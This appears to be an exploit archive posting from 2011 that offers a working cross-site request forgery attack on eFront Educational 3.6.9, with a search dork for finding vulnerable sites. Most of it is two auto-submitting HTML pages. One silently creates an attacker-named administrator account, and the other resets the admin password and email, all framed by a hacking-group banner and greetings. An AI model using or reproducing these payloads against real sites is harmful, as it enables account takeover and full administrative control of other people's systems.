eFront Educational <=XSRF (Add admin/change admin passwd)



EKU-ID: 375 CVE: OSVDB-ID:
Author: Caddy-Dz Published: 2011-06-01 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


=================================================================================
                      .__         .__  __            .__    .___

  ____ ___  _________ |  |   ____ |__|/  |_          |__| __| _/
_/ __ \\  \/  /\____ \|  |  /  _ \|  \   __\  ______ |  |/ __ |
\  ___/ >    < |  |_> >  |_(  <_> )  ||  |   /_____/ |  / /_/ |

\___  >__/\_ \|   __/|____/\____/|__||__|           |__\____ |
     \/      \/|__|                                          \/

Exploit-ID is the Indonesian Exploit Archive

Web             : exploit-id.com

e-mail          : root[at]exploit-id.com              

                      #########################################
                       I'm Caddy-Dz ,  member of exploit-id.com

                      #########################################  
================================================================================
####
# Exploit Title: eFront Educational <=XSRF (Add admin/change admin passwd)
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia@hotmail.com  |  Caddy-Dz@exploit-id.com
# Category:: webapps
# Google Dork: intext:"Educational Edition" inurl:/www/index.php
# Vendor: http://www.efrontlearning.net/
# Version: 3.6.9
# Tested on: [Windows Vista Edition Intégrale]
####

[*] #01# Add Admin: ~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~


<html>
<head>
<title>Algerians Hackers</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">

function fireForms()
{
    var count = 1;
    var i=0;
   
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
    }
}
  
</script>
<form  action="http://127.0.0.1/educational/www/administrator.php?ctg=personal&amp;user=admin&amp;op=profile&amp;add_user=1" method="post" name="user_form" id="user_form" enctype="multipart/form-data" onsubmit="try { var myValidator = validate_user_form; } catch(e) { return true; } return myValidator(this);">
  <input name="_qf__user_form" type="hidden" value="" /><input name="MAX_FILE_SIZE" type="hidden" value="8388608" />
  <table class = "formElements">

   <input type="hidden" name="login" / value="caddy-dz">
   <input type="hidden" name="password_" / value="caddy-dz">
   <input type="hidden" name="passrepeat" / value="caddy-dz">
   <input type="hidden" name="name" / value="islam">
   <input type="hidden" name="surname" / value="cadi">
   <input type="hidden" name="email" / value="caddy-dz@exploit-id.com">
   <input type="hidden" name="active" value="0" /><input class="inputCheckbox" id="activeCheckbox" name="active" type="checkbox" value="1" checked="checked" /></td></tr>
   <td class = "elementCell"><select name="user_type">
<option value="student">student</option>
<option value="professor">Professor</option>
<option value="administrator" selected="selected">Administrator</option>
</form>


[*] #02# Change Admin Password:~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


<html>
<head>
<title>Algerians Hackers</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">

function fireForms()
{
    var count = 1;
    var i=0;
   
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
    }
}
  
</script>
<form  method="post" name="user_form" action="http://127.0.0.1/educational/www/administrator.php?ctg=personal&amp;user=admin&amp;op=profile" id="user_form" enctype="multipart/form-data" onsubmit="try { var myValidator = validate_user_form; } catch(e) { return true; } return myValidator(this);">
  <input name="_qf__user_form" type="hidden" value="" /><input name="MAX_FILE_SIZE" type="hidden" value="8388608" />
  <table class = "formElements">
    <input type="hidden" name="login" value="admin" />
    <input type="hidden" name="password_" / value="caddy-dz">
    <input type="hidden" name="passrepeat"  / value="caddy-dz">
    <input type="hidden" name="name" value="System" />
    <input type="hidden" name="surname" value="Administrator" />
    <input type="hidden" name="email" value="caddy-dz@exploit-id.com" />
</form>

</body>
</html>

####
Peace From Algeria
####

=================================**Algerians Hackers**=======================================
# Greets To :
  KedAns-Dz & **All Algerians Hackers** , jos_ali_joe , All Exploit-Id Team ,  Kalashinkov3 ,
  (exploit-id.com) , (1337day.com) , (09exploit.com) , All My Friends: T!riRou , ChoK0 , MeRdaw! ,
  CaRras0 , StiffLer , MaaTar , St0fa , Nissou , RmZ ...others
============================================================================================